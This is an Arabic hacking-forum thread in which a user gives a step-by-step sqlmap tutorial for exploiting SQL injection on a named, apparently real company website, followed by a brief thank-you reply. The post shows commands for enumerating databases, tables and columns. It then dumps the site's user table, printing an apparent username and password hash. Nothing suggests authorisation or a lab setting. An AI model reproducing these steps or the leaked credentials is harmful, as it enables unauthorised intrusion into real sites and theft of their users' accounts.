بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف...

V!RùS_MàN

New Member
استغال ثغرات sql في الباك تراك
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك​

اسم الأداة :sqlmap​

مسار الاداة : /pentest/database/sqlmap​

لغة البرمجة : python​

الأن كيفية استخدام الاداة في عملية الحقن

اولا : استخراج اسماء قواعد البيانات

لنقل ان هذا الموقع مصاب بثغرة sql

كود:
[COLOR=Blue]http://www.bcspeakers.com/page.php?id=22[/COLOR]

وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع

كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs[/COLOR]


النتيجة

كود:
[COLOR=Blue]available databases [2]:
[*] information_schema
[*] www-bcspeakerstest[/COLOR]
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هى
"www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل


كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables[/COLOR]
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي


كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-[/COLOR][COLOR=Blue]bcspeakerstest [/COLOR][COLOR=Blue]-T _user --columns[/COLOR]
والنتيجة كالتالي

كود:
[COLOR=Blue]+----------+---------------------------+
| Column   | Type                      |
+----------+---------------------------+
| id_user  | int(10) unsigned zerofill |
| password | text                      |
| username | text                      |
+----------+---------------------------+[/COLOR]
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump[/COLOR]
النتيجة

كود:
[COLOR=Blue]+--------------+
| username     |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+[/COLOR]
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد


كود:
[COLOR=Blue]python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump[/COLOR]

سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة

كود:
[COLOR=Blue]recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q][/COLOR]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي


كود:
[COLOR=Blue]+----------------------------------+
| password                         |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+[/COLOR]

كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
والسلام عليكم ورحمة الله وبركاته

 

hank00sh

New Member
استغال ثغرات sql في الباك تراك
رد: استغال ثغرات sql في الباك تراك

مشكور اخوي

بصراحه شرح مميز مع انو خبرتي في الباك تراك والينكس ضعيفه

يعني خبرتي في اي نظام اخر غير الاكس بي والفيستا والسبعه مو قد كذا

بس شفت موضوعك بصراحه ممتاز وان شاء الله يستفيدو منك الكبار في هذا النظام

تحياتي لك وتقبل مروري
 
أعلى